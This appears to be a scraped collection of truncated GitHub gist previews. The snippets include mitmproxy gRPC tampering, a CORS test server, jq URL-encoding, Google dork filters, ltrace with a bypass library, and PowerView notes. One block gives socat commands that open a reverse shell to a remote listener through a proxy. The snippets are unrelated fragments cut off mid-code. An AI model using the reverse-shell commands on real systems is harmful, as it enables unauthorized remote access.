| # | |
| # Author: Hacktivate Co., Ltd. (https://hacktivate.tech) | |
| # | |
| # Description: This is an mitmproxy extension for editing gRPC messages over HTTP/2. | |
| # Full blog post can be found at: https://hacktivate.tech/2022/10/27/a-hackish-way-to-tamper-grpc-traffic-in-android.html | |
| # | |
| from concurrent.futures.process import _threads_wakeups |
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # Rau Systemberatung GmbH (rausys.de) | |
| # Licensed under the GNU General Public License, Version 3 | |
| import asyncore | |
| import smtpd | |
| import os |
Reference https://stackoverflow.com/a/34407620/13287790
$ printf %s 'encode this'|jq -sRr @uri
encode%20this
$ jq -rn --arg x 'encode this' '$x|@uri'
encode%20this
# -r (--raw-output) outputs the raw contents of strings instead of JSON string literals. -n (--null-input) doesn't read input from STDIN.
| #!/usr/bin/env python3 | |
| from http.server import HTTPServer, SimpleHTTPRequestHandler, test | |
| import sys | |
| class CORSRequestHandler (SimpleHTTPRequestHandler): | |
| def end_headers (self): | |
| self.send_header('Access-Control-Allow-Origin', '*') | |
| SimpleHTTPRequestHandler.end_headers(self) | |
| if __name__ == '__main__': |
| ltrace -S -l ./bypass.so ./app | |
| ltrace -l ./bypass.so -x @ ./app |
| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
| # Listener on x.x.x.x:443: | |
| socat file:`tty`,raw,echo=0 tcp-listen:443 | |
| # Reverse shell proxy server is at 10.10.10.1:8222: | |
| socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 & | |
| socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x" |
| ''' | |
| If you ever wondered how overlaying works in python curses lib so did I! This is how it works: | |
| ''' | |
| import curses | |
| def start(stdscr): | |
| # sets up no delay so keys dont overload CPU | |
| stdscr.nodelay(False) | |
| # no blinking cursor |
| from datetime import datetime, timedelta | |
| def to_timestamp(timestamp): | |
| timestamp = float(timestamp[0]) | |
| seconds_since_epoch = timestamp/10**7 | |
| loc_dt = datetime.fromtimestamp(seconds_since_epoch) | |
| loc_dt -= timedelta(days=(1970 - 1601) * 365 + 89) | |
| return loc_dt |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |